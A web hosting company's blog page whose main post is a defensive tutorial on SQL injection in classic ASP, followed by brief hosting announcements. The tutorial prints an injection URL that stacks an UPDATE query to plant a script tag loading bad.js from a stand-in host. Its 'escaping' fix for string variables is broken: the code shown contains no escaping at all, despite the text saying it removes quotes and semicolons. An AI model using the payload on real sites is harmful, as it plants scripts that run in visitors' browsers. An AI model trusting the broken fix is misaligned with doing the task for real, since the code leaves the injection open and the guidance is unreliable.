Blog
"SQL Injection" has become an increasingly common way for hackers to attack web sites, but what is SQL Injection and what can web developers do to avoid it?
SQL injection involves manipulating the variables sent to a web page in order to place additional SQL queries within queries used as part of the web site code.
There are a multitude of ways SQL Injection can be used for nefarious purposes but today we are going to look at the most common method at the moment being used to insert malicious javascript files into web sites
Take the following simple example using ASP:
testpage.asp <% szQuery = "Select * From myTable Where ID = " & Request("ID") … %> |
Because the Request("ID") variable isn't filtered or checked in any way, an attacker can manipulate the URL request string to insert any commands they like into the table.
So if they have a script at say http://testdomain.local/bad.js and the myTable has a column called "Description" which is used to display information on the page, an attacker could use the following:
"testpage.asp?ID=1;Update myTable set Description = '<script src="http://testdomain.local/bad.js"></script>' Where ID = 1" |
This will update the record with ID = 1 to insert the javascript into the description field.
THIS IS BAD
So how does one fix it?
The best approach is to not use request variables directly in SQL in the first place, but in ASP this is not always an easy option.
In ASP.NET however, the problem can be solved by using the SQLCommand.Parameters to add each variable that is needed in the query.
Then the SQL Query will look something like this:
Select * From myTable Where ID = @ID; |
But if you need to quickly fix older code in ASP, then filtering each request variable manually is a reasonable approach.
(Though not completely fool proof)
<% szID = Request("ID") szQuery = "Select * From myTable Where ID = '" & szID & "'" %> |
The above will "escape" potentially dangerous characters such as ' and ; from the variable completely.
Note that the above is only helpful if the ID variable is a string.
If the variable is a known type other than a string (say Integer) then casting must be used to prevent nasty SQL from being inserted:
<% iID = CINT(Request("ID")) szQuery = "Select * From myTable Where ID = " & iID … %> |
In the above example, if an attacker tries to insert something into ID, it will cause an error and refuse to run the query.
So there you have it, SQL Injection is easy to avoid once you know how.
Just a quick post to say that IIS 7.0 is now available on all our Web Hosting plans.
Check out http://www.studiocoast.com.au/web-hosting.aspx for more information.
If you've wondered why there haven't been any posts to our blog in the last few weeks then wonder no more!
I have been busy at work on the latest version of our customer management system codenamed "blackbriar" (see our blog entry about "Alcatraz" for what the system is all about)
The two key features of this release are:
We'll be releasing an IIS7 based Web Hosting service to the public soon, but in the mean time power users may be more interested in our new Hyper-V VPS service which comes with Windows Server 2008 and IIS7 as standard.